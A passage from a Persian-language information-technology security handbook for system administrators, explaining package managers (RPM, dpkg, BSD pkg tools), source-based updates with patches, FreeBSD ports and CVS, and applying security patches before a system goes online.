‫ﺍﺻﻼﺣﺎﺕ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﻛﺰﻱ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪108 Metadata‬‬
‫‪٣٠١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﻨﻬﺎ ﻣﺨﺼﻮﺹ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ‪ .‬ﺗﻮﺯﻳﻌﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻧﻴـﺰ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ‪ .‬ﭼﻨـﺪﻳﻦ ﺗﻮﺯﻳـﻊ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ ،Linux‬ﺳﻴـﺴﺘﻢ‬
‫ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ ١٠٩RPM‬ﺭﺍ ﺑﺮﮔﺰﻳﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻚ ﻓﺮﻣﺎﻥ ‪ rpm‬ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﻮﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ Debian GNU/Linux .‬ﺍﺯ ﻳﻚ ﺳﻴـﺴﺘﻢ ﻣـﺪﻳﺮﻳﺖ ﺑـﺴﺘﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺟـﺎﻳﮕﺰﻳﻦ ﺑﻨـﺎﻡ ‪ dpkg‬ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ BSD‬ﺭﻭﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ‪ ١١٠‬ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻓﺮﺍﻣﻴﻦ ‪ ،pkg_delete ،pkg_add‬ﻭ ‪ pkg_info‬ﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬

‫ﺳﻴﺴﺘﻢﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ‬


‫ﻻ ﺑﺮ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻳـﻚ‬
‫ﺑﺮﺧﻼﻑ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺴﺨﺔ ﺑﻪﺭﻭﺯ ﺷﺪﺓ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﺟﻤـﻪ ﻭ ﻧـﺼﺐ‬
‫ﺷﻮﻧﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺍﺯ ﭼﻨﺪ ﻣﻨﻈﺮ ﺑﺮ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻴﺢ ﺩﺍﺭﺩ‪ :‬ﻳﻚ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣـﺘﻦ ﺗﻨﻬـﺎ ﺩﺭ‬
‫ﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺗﺮﺟﻤﻪ ﺷﺪﻩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﻣﺠﺰﺍ ﺑﺮﺍﻱ ﻫﺮ ﻣﻌﻤﺎﺭﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬ ‫ﻳﻚ ﻧﺴﺨﻪ ﻭﺍﺣﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﻣﻘﺎﺑ ﹺ‬
‫ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺗﺮﺟﻤﻪ ﻭ ﺑﺴﺘﻪﺑﻨﺪﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻻﺯﻡ ﺷﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ‬
‫ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﺗﻨﻬﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺳﺎﺧﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻧﻲ ﮔﻴﺞﻛﻨﻨﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻳـﻚ ﻃـﺮﻑ ﺷـﻤﺎ ﺁﺯﺍﺩ‬
‫ﻫﺴﺘﻴﺪ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻴﭽﮕﻮﻧﻪ ﺍﺷﻜﺎﻝ ﭘﻨﻬﺎﻥ ﻳﺎ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﻋﻤﻞ ﺍﻧﺠﺎﻡ ﺍﻳﻦ‬
‫ﺑﺮﺭﺳﻲ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻭ ﺑﻨﺪﺭﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ؛ ﻭ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺷـﻤﺎ ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ‪،‬‬
‫ﺑﺮﺍﻳﺶ ﻣﺸﻜﻞ ﭼﻨﺪﺍﻧﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺐ ﺗﺮﺍﻭﺍﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻛﻨﺪ! ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻳـﺪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻫﻢ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﺮﺟﻤﻪ ﻣﻲﻛﻨﻴﺪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ ،‬ﻭ ﻫﻢ ﺍﻳﻨﮑﻪ ﻳﻚ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪.‬‬

‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻭﺻﻠﻪﻫﺎ‬


‫ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﻢ ﻭ ﻫﺮﮔـﺎﻩ ﻛـﻪ‬
‫ﻻ ﺑﻪ ﺷـﻜﻞ ﻳـﻚ ‪patch‬‬ ‫ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤﻪ ﻧﻤﺎﻳﻴﻢ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﺍﺻﻼﺡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫‪ diff‬ﺍﺳﺖ؛ ﻓﺎﻳﻠﻲ ﻛﻪ ﺷﺮﺡ ﻣﻲﺩﻫﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ ﺧﻄﻮﻁ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪ ،‬ﭘﺎﻙ ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﺑﻪ ﺁﻥ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺗﻮﻟﻴﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﻣﻨﺠﺮ ﺷﻮﺩ‪ .‬ﺑﺮﻧﺎﻣﻪ ‪ diff‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻼﺣﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺁﻧﻬﺎ ﺑﻪ ﻧﺴﺨﻪ ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﺗـﺎ ﺑـﺎ‬
‫ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﺷﻮﺩ‪ .‬ﺑﻌﺪ ﺍﺯ ﺍﺻﻼﺡ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺗﺮﺟﻤﻪ ﻛﺮﺩﻩ ﻭ ﺁﻧﺮﺍ‬
‫ﻣﺠﺪﺩﹰﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬

‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Free BSD‬ﻭ ﻧﺴﺨﻪﻫﺎﻱ ‪ Unix‬ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺭﺍ ﺩﺭ ﻣﺠﻤﻮﻋـﻪ ‪port‬ﻫـﺎﻱ ﺧـﻮﺩ ﻣﻨﺘـﺸﺮ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﻭ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺻﻼﺡﻫﺎﻳﻲ ﻛﻪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺗﺎ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺮﻧﺎﻣﻪ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺩﺭ ﻣﺤﻴﻂ ‪ BSD‬ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺗﺮﺟﻤﻪ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﻣﻲﺳـﺎﺯﻧﺪ‪ ،‬ﺁﻧـﺮﺍ‬
‫ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺮﻧﺎﻣﻪ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ ‪ BSD‬ﻣﺮﺑﻮﻃﻪ )‪ (pkg_odd‬ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪FreeBSD‬‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﻴﺰﺍﻥ ﻭﺳﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪109 RPM Package Management‬‬


‫‪110 Source-Based Updates‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠٢‬‬

‫‪CVS‬‬
‫‪١١١‬‬
‫ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﮐﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣـﺘﻦ‬
‫ﺑﺮﻧﺎﻣﻪ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﻧﺴﺨﻪﻫﺎﻱ ﻫﻤﺰﻣﺎﻥ )‪ ١١٢،(CVS‬ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻥ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ‪ .‬ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺧﻮﺩ ﺭﺍ ﺗﺎ ﺁﺧﺮﻳﻦ ﺑﺮﻭﻧﺪﺍﺩ ﺑﻪﺭﻭﺯ ﻛﻨﻨﺪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻧﻬﺎﻳﻲ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺍﺻﻼﺡﺷـﺪﻩ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣﻪ ‪ CVS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻣﺘﻦ ﺑﻪﺭﻭﺯ ﺩﺭﺁﻣﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺟﻤﻪ ﻭ ﻧﺼﺐ ﺷﻮﺩ‪.‬‬
‫‪ ،NetBSD ،FreeBSD‬ﻭ ‪ OpenBSD‬ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺮﻛﺰﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺧـﻮﺩ ﺍﺯ ‪ CVS‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ CVS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨﻨـﺪ ﻳـﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ‬
‫ﻣﺜﻞ ‪ sourceforge.net‬ﻛﻪ ﻣﺨﺎﺯﻥ ‪ CVS‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺮﺟـﻊ ﺧـﻮﺏ ‪ CVS‬ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﻛﺘـﺎﺏ‬
‫"ﺿﺮﻭﺭﻳﺎﺕ ‪ (Essential CVS) "CVS‬ﺍﺷﺎﺭﻩ ﮐﺮﺩ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ‬


‫ﻲ ﺁﺷﻜﺎﺭ‬‫ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﺷﻮﺩ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻭﺻﻠﻪﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺗﻤﺎﻡ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﺍﻋﻤﺎﻝ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻓﺮﺍﮔﻴـﺮﻱ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺗﺎﺯﻩ ﻛﺸﻒﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﮔﻮﺵ ﺑﻪ ﺯﻧﮓ ﺑﺎﺷﻴﺪ ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺻﻼﺡﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻧﺪ ﺁﻧﻬﺎ‬
‫ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﻳﻤﻦﺗﺮﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺎﺯﻩ ﻧﺼﺐ ﺷﺪﻩ ‪ download‬ﻛﺮﺩﻥ ﺍﺻﻼﺡﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮ ﻭ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﺧﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺍﻳﻤﻨﻲ ﺑﻪﺭﻭﺯ ﺷﺪﻩ )ﻣﺜ ﹰﻼ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ Mac‬ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻛﻪ ﻫﻴﭻ ﺧﺪﻣﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻧﻤـﻲﻛﻨـﺪ(‪.‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎﻱ ﻣﻮﺭﺩ ﺑﺤﺚ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻳﻜﺒﺎﺭ ‪ download‬ﺷﺪﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﻣﻨﺘﻘﻞ ﻛﺮﺩ ﻳﺎ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻳﻚ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺮﺩ ﻭ ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﻣﻨﺎﺳـﺐ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﭼﻨـﺪﻳﻦ ﺭﺍﻳﺎﻧـﻪ ﺩﺍﺭﻳـﺪ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﺷﺪﻥ ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎ ‪ download‬ﻛﺮﺩﻥ ﭼﻨﺪﺑﺎﺭﺓ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎ ﺍﺗـﺼﺎﻝ ﺷـﺒﻜﻪ ﺭﺍ ﻛﻨـﺪ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ ﻭ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺭﻭﻱ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﮏ ﻓﺸﺮﺩﻩ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨـﺪ‪ .‬ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﮑﺮﻭﺳﺎﻓﺖ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ WindowsUpdate Catalog‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻬﺎﻱ ﻗﺎﺑﻞ ‪ download‬ﺭﺍ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﺍﺳﺖ‪.‬‬
